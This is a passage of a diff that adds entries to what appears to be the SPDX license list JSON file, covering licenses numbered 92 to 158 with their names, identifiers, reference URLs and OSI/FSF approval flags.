+      "name": "LaTeX Project Public License v1.0",
+      "licenseId": "LPPL-1.0",
+      "seeAlso": [
+        "http://www.latex-project.org/lppl/lppl-1-0.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.0+.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.0+.json",
+      "referenceNumber": 92,
+      "name": "GNU Library General Public License v2 or later",
+      "licenseId": "LGPL-2.0+",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SGI-B-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SGI-B-1.0.json",
+      "referenceNumber": 93,
+      "name": "SGI Free Software License B v1.0",
+      "licenseId": "SGI-B-1.0",
+      "seeAlso": [
+        "http://oss.sgi.com/projects/FreeB/SGIFreeSWLicB.1.0.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/APL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/APL-1.0.json",
+      "referenceNumber": 94,
+      "name": "Adaptive Public License 1.0",
+      "licenseId": "APL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/APL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/libtiff.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/libtiff.json",
+      "referenceNumber": 95,
+      "name": "libtiff License",
+      "licenseId": "libtiff",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/libtiff"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AFL-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AFL-2.1.json",
+      "referenceNumber": 96,
+      "name": "Academic Free License v2.1",
+      "licenseId": "AFL-2.1",
+      "seeAlso": [
+        "http://opensource.linux-mirror.org/licenses/afl-2.1.txt"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-1.0.json",
+      "referenceNumber": 97,
+      "name": "Creative Commons Attribution Non Commercial 1.0 Generic",
+      "licenseId": "CC-BY-NC-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc/1.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GD.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GD.json",
+      "referenceNumber": 98,
+      "name": "GD License",
+      "licenseId": "GD",
+      "seeAlso": [
+        "https://libgd.github.io/manuals/2.3.0/files/license-txt.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AFL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AFL-1.1.json",
+      "referenceNumber": 99,
+      "name": "Academic Free License v1.1",
+      "licenseId": "AFL-1.1",
+      "seeAlso": [
+        "http://opensource.linux-mirror.org/licenses/afl-1.1.txt",
+        "http://wayback.archive.org/web/20021004124254/http://www.opensource.org/licenses/academic.php"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-IGO.json",
+      "referenceNumber": 100,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 IGO",
+      "licenseId": "CC-BY-NC-ND-3.0-IGO",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-nd/3.0/igo/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Unicode-DFS-2015.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2015.json",
+      "referenceNumber": 101,
+      "name": "Unicode License Agreement - Data Files and Software (2015)",
+      "licenseId": "Unicode-DFS-2015",
+      "seeAlso": [
+        "https://web.archive.org/web/20151224134844/http://unicode.org/copyright.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-only.json",
+      "referenceNumber": 102,
+      "name": "GNU Free Documentation License v1.2 only",
+      "licenseId": "GFDL-1.2-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MPL-1.1.json",
+      "referenceNumber": 103,
+      "name": "Mozilla Public License 1.1",
+      "licenseId": "MPL-1.1",
+      "seeAlso": [
+        "http://www.mozilla.org/MPL/MPL-1.1.html",
+        "https://opensource.org/licenses/MPL-1.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0-only.json",
+      "referenceNumber": 104,
+      "name": "GNU General Public License v2.0 only",
+      "licenseId": "GPL-2.0-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+        "https://opensource.org/licenses/GPL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-4.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-4.0.json",
+      "referenceNumber": 105,
+      "name": "Creative Commons Attribution Non Commercial 4.0 International",
+      "licenseId": "CC-BY-NC-4.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc/4.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/FreeImage.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/FreeImage.json",
+      "referenceNumber": 106,
+      "name": "FreeImage Public License v1.0",
+      "licenseId": "FreeImage",
+      "seeAlso": [
+        "http://freeimage.sourceforge.net/freeimage-license.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SHL-0.51.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SHL-0.51.json",
+      "referenceNumber": 107,
+      "name": "Solderpad Hardware License, Version 0.51",
+      "licenseId": "SHL-0.51",
+      "seeAlso": [
+        "https://solderpad.org/licenses/SHL-0.51/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CNRI-Jython.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CNRI-Jython.json",
+      "referenceNumber": 108,
+      "name": "CNRI Jython License",
+      "licenseId": "CNRI-Jython",
+      "seeAlso": [
+        "http://www.jython.org/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ZPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ZPL-1.1.json",
+      "referenceNumber": 109,
+      "name": "Zope Public License 1.1",
+      "licenseId": "ZPL-1.1",
+      "seeAlso": [
+        "http://old.zope.org/Resources/License/ZPL-1.1"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Afmparse.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Afmparse.json",
+      "referenceNumber": 110,
+      "name": "Afmparse License",
+      "licenseId": "Afmparse",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Afmparse"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.1.json",
+      "referenceNumber": 111,
+      "name": "Open LDAP Public License v2.1",
+      "licenseId": "OLDAP-2.1",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db0d176738e96a0d3b9f85cb51e140a86f21be715"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Rdisc.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Rdisc.json",
+      "referenceNumber": 112,
+      "name": "Rdisc License",
+      "licenseId": "Rdisc",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Rdisc_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Imlib2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Imlib2.json",
+      "referenceNumber": 113,
+      "name": "Imlib2 License",
+      "licenseId": "Imlib2",
+      "seeAlso": [
+        "http://trac.enlightenment.org/e/browser/trunk/imlib2/COPYING",
+        "https://git.enlightenment.org/legacy/imlib2.git/tree/COPYING"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-4-Clause-Shortened.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-Shortened.json",
+      "referenceNumber": 114,
+      "name": "BSD 4 Clause Shortened",
+      "licenseId": "BSD-4-Clause-Shortened",
+      "seeAlso": [
+        "https://metadata.ftp-master.debian.org/changelogs//main/a/arpwatch/arpwatch_2.1a15-7_copyright"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Sendmail.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Sendmail.json",
+      "referenceNumber": 115,
+      "name": "Sendmail License",
+      "licenseId": "Sendmail",
+      "seeAlso": [
+        "http://www.sendmail.com/pdfs/open_source/sendmail_license.pdf",
+        "https://web.archive.org/web/20160322142305/https://www.sendmail.com/pdfs/open_source/sendmail_license.pdf"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5.json",
+      "referenceNumber": 116,
+      "name": "Creative Commons Attribution 2.5 Generic",
+      "licenseId": "CC-BY-2.5",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/2.5/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AAL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AAL.json",
+      "referenceNumber": 117,
+      "name": "Attribution Assurance License",
+      "licenseId": "AAL",
+      "seeAlso": [
+        "https://opensource.org/licenses/attribution"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.json",
+      "referenceNumber": 118,
+      "name": "Mozilla Public License 2.0 (no copyleft exception)",
+      "licenseId": "MPL-2.0-no-copyleft-exception",
+      "seeAlso": [
+        "http://www.mozilla.org/MPL/2.0/",
+        "https://opensource.org/licenses/MPL-2.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.json",
+      "referenceNumber": 119,
+      "name": "Creative Commons Attribution Non Commercial No Derivatives 2.5 Generic",
+      "licenseId": "CC-BY-NC-ND-2.5",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-nd/2.5/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-3.0-NL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-NL.json",
+      "referenceNumber": 120,
+      "name": "Creative Commons Attribution 3.0 Netherlands",
+      "licenseId": "CC-BY-3.0-NL",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/3.0/nl/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LPL-1.02.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LPL-1.02.json",
+      "referenceNumber": 121,
+      "name": "Lucent Public License v1.02",
+      "licenseId": "LPL-1.02",
+      "seeAlso": [
+        "http://plan9.bell-labs.com/plan9/license.html",
+        "https://opensource.org/licenses/LPL-1.02"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ECL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ECL-1.0.json",
+      "referenceNumber": 122,
+      "name": "Educational Community License v1.0",
+      "licenseId": "ECL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/ECL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OFL-1.0-no-RFN.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OFL-1.0-no-RFN.json",
+      "referenceNumber": 123,
+      "name": "SIL Open Font License 1.0 with no Reserved Font Name",
+      "licenseId": "OFL-1.0-no-RFN",
+      "seeAlso": [
+        "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.json",
+      "referenceNumber": 124,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Germany",
+      "licenseId": "CC-BY-NC-SA-3.0-DE",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/3.0/de/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0.json",
+      "referenceNumber": 125,
+      "name": "Creative Commons Attribution Share Alike 3.0 Unported",
+      "licenseId": "CC-BY-SA-3.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/3.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NTP.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NTP.json",
+      "referenceNumber": 126,
+      "name": "NTP License",
+      "licenseId": "NTP",
+      "seeAlso": [
+        "https://opensource.org/licenses/NTP"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MPL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MPL-2.0.json",
+      "referenceNumber": 127,
+      "name": "Mozilla Public License 2.0",
+      "licenseId": "MPL-2.0",
+      "seeAlso": [
+        "https://www.mozilla.org/MPL/2.0/",
+        "https://opensource.org/licenses/MPL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/APSL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/APSL-1.2.json",
+      "referenceNumber": 128,
+      "name": "Apple Public Source License 1.2",
+      "licenseId": "APSL-1.2",
+      "seeAlso": [
+        "http://www.samurajdata.se/opensource/mirror/licenses/apsl.php"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.json",
+      "referenceNumber": 129,
+      "name": "GNU Free Documentation License v1.2 only - no invariants",
+      "licenseId": "GFDL-1.2-no-invariants-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Artistic-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Artistic-2.0.json",
+      "referenceNumber": 130,
+      "name": "Artistic License 2.0",
+      "licenseId": "Artistic-2.0",
+      "seeAlso": [
+        "http://www.perlfoundation.org/artistic_license_2_0",
+        "https://www.perlfoundation.org/artistic-license-20.html",
+        "https://opensource.org/licenses/artistic-license-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0.json",
+      "referenceNumber": 131,
+      "name": "GNU General Public License v2.0 only",
+      "licenseId": "GPL-2.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+        "https://opensource.org/licenses/GPL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/RSCPL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/RSCPL.json",
+      "referenceNumber": 132,
+      "name": "Ricoh Source Code Public License",
+      "licenseId": "RSCPL",
+      "seeAlso": [
+        "http://wayback.archive.org/web/20060715140826/http://www.risource.org/RPL/RPL-1.0A.shtml",
+        "https://opensource.org/licenses/RSCPL"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Sleepycat.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Sleepycat.json",
+      "referenceNumber": 133,
+      "name": "Sleepycat License",
+      "licenseId": "Sleepycat",
+      "seeAlso": [
+        "https://opensource.org/licenses/Sleepycat"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/xpp.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/xpp.json",
+      "referenceNumber": 134,
+      "name": "XPP License",
+      "licenseId": "xpp",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/xpp"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CDLA-Sharing-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CDLA-Sharing-1.0.json",
+      "referenceNumber": 135,
+      "name": "Community Data License Agreement Sharing 1.0",
+      "licenseId": "CDLA-Sharing-1.0",
+      "seeAlso": [
+        "https://cdla.io/sharing-1-0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/ClArtistic.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ClArtistic.json",
+      "referenceNumber": 136,
+      "name": "Clarified Artistic License",
+      "licenseId": "ClArtistic",
+      "seeAlso": [
+        "http://gianluca.dellavedova.org/2011/01/03/clarified-artistic-license/",
+        "http://www.ncftp.com/ncftp/doc/LICENSE.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/AGPL-1.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-only.json",
+      "referenceNumber": 137,
+      "name": "Affero General Public License v1.0 only",
+      "licenseId": "AGPL-1.0-only",
+      "seeAlso": [
+        "http://www.affero.org/oagpl.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-3.0-DE.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-DE.json",
+      "referenceNumber": 138,
+      "name": "Creative Commons Attribution 3.0 Germany",
+      "licenseId": "CC-BY-3.0-DE",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/3.0/de/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AFL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AFL-2.0.json",
+      "referenceNumber": 139,
+      "name": "Academic Free License v2.0",
+      "licenseId": "AFL-2.0",
+      "seeAlso": [
+        "http://wayback.archive.org/web/20060924134533/http://www.opensource.org/licenses/afl-2.0.txt"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Intel.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Intel.json",
+      "referenceNumber": 140,
+      "name": "Intel Open Source License",
+      "licenseId": "Intel",
+      "seeAlso": [
+        "https://opensource.org/licenses/Intel"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.json",
+      "referenceNumber": 141,
+      "name": "GNU Free Documentation License v1.1 or later - no invariants",
+      "licenseId": "GFDL-1.1-no-invariants-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/APAFML.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/APAFML.json",
+      "referenceNumber": 142,
+      "name": "Adobe Postscript AFM License",
+      "licenseId": "APAFML",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/AdobePostscriptAFM"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.2.json",
+      "referenceNumber": 143,
+      "name": "GNU Free Documentation License v1.2",
+      "licenseId": "GFDL-1.2",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SISSL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SISSL.json",
+      "referenceNumber": 144,
+      "name": "Sun Industry Standards Source License v1.1",
+      "licenseId": "SISSL",
+      "seeAlso": [
+        "http://www.openoffice.org/licenses/sissl_license.html",
+        "https://opensource.org/licenses/SISSL"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Naumen.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Naumen.json",
+      "referenceNumber": 145,
+      "name": "Naumen Public License",
+      "licenseId": "Naumen",
+      "seeAlso": [
+        "https://opensource.org/licenses/Naumen"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/HTMLTIDY.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/HTMLTIDY.json",
+      "referenceNumber": 146,
+      "name": "HTML Tidy License",
+      "licenseId": "HTMLTIDY",
+      "seeAlso": [
+        "https://github.com/htacg/tidy-html5/blob/next/README/LICENSE.md"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.8.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.8.json",
+      "referenceNumber": 147,
+      "name": "Open LDAP Public License v2.8",
+      "licenseId": "OLDAP-2.8",
+      "seeAlso": [
+        "http://www.openldap.org/software/release/license.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/blessing.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/blessing.json",
+      "referenceNumber": 148,
+      "name": "SQLite Blessing",
+      "licenseId": "blessing",
+      "seeAlso": [
+        "https://www.sqlite.org/src/artifact/e33a4df7e32d742a?ln\u003d4-9",
+        "https://sqlite.org/src/artifact/df5091916dbb40e6"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-ND-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.0.json",
+      "referenceNumber": 149,
+      "name": "Creative Commons Attribution No Derivatives 2.0 Generic",
+      "licenseId": "CC-BY-ND-2.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd/2.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGTSL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGTSL.json",
+      "referenceNumber": 150,
+      "name": "Open Group Test Suite License",
+      "licenseId": "OGTSL",
+      "seeAlso": [
+        "http://www.opengroup.org/testing/downloads/The_Open_Group_TSL.txt",
+        "https://opensource.org/licenses/OGTSL"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.0-or-later.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-or-later.json",
+      "referenceNumber": 151,
+      "name": "GNU Library General Public License v2 or later",
+      "licenseId": "LGPL-2.0-or-later",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Parity-7.0.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Parity-7.0.0.json",
+      "referenceNumber": 152,
+      "name": "The Parity Public License 7.0.0",
+      "licenseId": "Parity-7.0.0",
+      "seeAlso": [
+        "https://paritylicense.com/versions/7.0.0.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-ND-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-1.0.json",
+      "referenceNumber": 153,
+      "name": "Creative Commons Attribution No Derivatives 1.0 Generic",
+      "licenseId": "CC-BY-ND-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd/1.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/dvipdfm.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/dvipdfm.json",
+      "referenceNumber": 154,
+      "name": "dvipdfm License",
+      "licenseId": "dvipdfm",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/dvipdfm"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CNRI-Python.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CNRI-Python.json",
+      "referenceNumber": 155,
+      "name": "CNRI Python License",
+      "licenseId": "CNRI-Python",
+      "seeAlso": [
+        "https://opensource.org/licenses/CNRI-Python"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/BSD-4-Clause-UC.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-UC.json",
+      "referenceNumber": 156,
+      "name": "BSD-4-Clause (University of California-Specific)",
+      "licenseId": "BSD-4-Clause-UC",
+      "seeAlso": [
+        "http://www.freebsd.org/copyright/license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NLOD-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NLOD-1.0.json",
+      "referenceNumber": 157,
+      "name": "Norwegian Licence for Open Government Data (NLOD) 1.0",
+      "licenseId": "NLOD-1.0",
+      "seeAlso": [
+        "http://data.norge.no/nlod/en/1.0"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/MS-RL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MS-RL.json",
+      "referenceNumber": 158,
+      "name": "Microsoft Reciprocal License",
+      "licenseId": "MS-RL",
+      "seeAlso": [
+        "http://www.microsoft.com/opensource/licenses.mspx",
+        "https://opensource.org/licenses/MS-RL"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.html",
+      "isDeprecatedLicenseId": false,
